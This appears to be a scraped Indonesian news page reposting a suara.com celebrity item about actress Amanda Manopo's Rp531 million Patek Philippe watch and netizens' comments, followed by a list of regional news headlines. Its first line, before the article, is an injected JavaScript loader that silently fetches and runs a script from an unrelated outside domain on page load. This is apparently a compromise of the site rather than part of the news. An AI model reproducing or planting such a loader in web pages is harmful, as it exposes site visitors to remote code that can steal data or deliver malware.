(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
selebriti

Amanda Manopo Pakai Jam Tangan Mewah Rp500 Juta, Warganet Sentil Calon Suami


KANALKALIMANTAN.COM – Amanda Manopo kembali kedapatan memakai jam tangan mewah dalam sebuah unggahan media sosial. Kali ini, harga jam tangan itu disebut mencapai setengah miliar.

Adalah akun Instagram @fashionamandamanopo yang lagi-lagi mengulas jam tangan Amanda. Akun ini memang sering menelusuri beragam barang fesyen yang dikenakan oleh artis cantik itu.

Menurut akun tersebut, Amanda Manopo memakai jam tangan keluaran perusahaan jam mewah asal Swiss, Patek Philippe. Seri yang dipakai Amanda adalah Patek Philippe Twenty-4 Watch.

Tidak main-main, jam tangan Amanda terbuat dari emas 18 karat dan dihiasi berlian. Jam tersebut dibanderol dengan harga sekitar USD 36 ribu atau hampir setara Rp531,7 juta.

 

 

Baca Juga:
RESMI. Denny Indrayana Ajukan Sengketa Hasil PSU Pilgub Kalsel ke MK

Warganet tentu heboh melihat fakta yang disuguhkan akun @fashionamandamanopo tentang jam tangan mewah Amanda. Beberapa warganet menyentil calon suami Amanda di masa depan.

Jam tangan mewah Amanda Manopo seharga Rp531 juta. (Instagram/@fashionamandamanopo)

“Di gue bisa buat bikin rumah. Sisanya beli kendaraan hastagah,” celetuk warganet syok.

“Calon suami Manda insecure gak ya liat fashion Manda harganya selalu bikin melongo gini,” tutur yang lain.

“Makanya semoga Manda dapetin suami yang sepadan sama dia supaya bisa menuhin kebutuhannya, kalo nggak ya repot,” imbuh lainnya.

“Yang tajir melintir ya gas poll, Manda mah bojoable banget. Bisa masak, smart, good looking, good attitude,” timpal yang lain.

Baca Juga:
Bawa Surat Antigen Palsu, Seorang Pelajar Diamankan di Bandara Syamsudin Noor

Sebelumnya, Amanda Manopo beberapa kali kedapatan memakai jam tangan mewah dari merek Rolex dan Audemars Piguet. Harga jam tangan tersebut masing-masing adalah Rp267 juta dan Rp332 juta.

Amanda juga pernah mengenakan aksesoris lain yang harganya tak kalah mahal. Di antaranya adalah kalung berlian dari merek Bvlgari yang harganya mencapai Rp1,4 miliar. (suara.com)


Al Ghifari

Recent Posts

Pj Bupati Kapuas Perpisahan dengan Dua Pejabat Purna Tugas

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi didampingi Pj Ketua TP PKK… Read More

25 menit ago

Curi Mobil Modus Duplikat Kunci, NY Diringkus Satreskrim Polresta Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Satuan Reskrim Polresta Banjarmasin meringkus seseorang lelaki berinisial NY (37) karena melakukan… Read More

16 jam ago

Sah! Ini 30 Calon Terpilih Anggota DPRD HSU 2024-2029

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) menetapkan 30 perolehan… Read More

19 jam ago

Sebelum Dilantik, 30 Calon Terpilih DPRD Banjarbaru Harus Lapor Harta Kekayaan

KANALKALIMANTAN.COM, BANJARBARU – Calon terpilih Anggota Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru pada Pemilu… Read More

22 jam ago

Tiga Putra HSU Terbaik Pertama Syarhil Qur’an MTQ XXXV Kalsel

KANALKALIMANTAN.COM, RANTAU - Enam orang dari kafilah Kabupaten Hulu Sungai Utara (HSU) sukses meraih prestasi… Read More

23 jam ago

Resmi Ditetapkan, Ini 45 Calon Terpilih Anggota DPRD Banjarmasin 2024-2029

PAN, Golkar dan PKS Masing-masing 7 Kursi di DPRD Banjarmasin Read More

23 jam ago

This website uses cookies.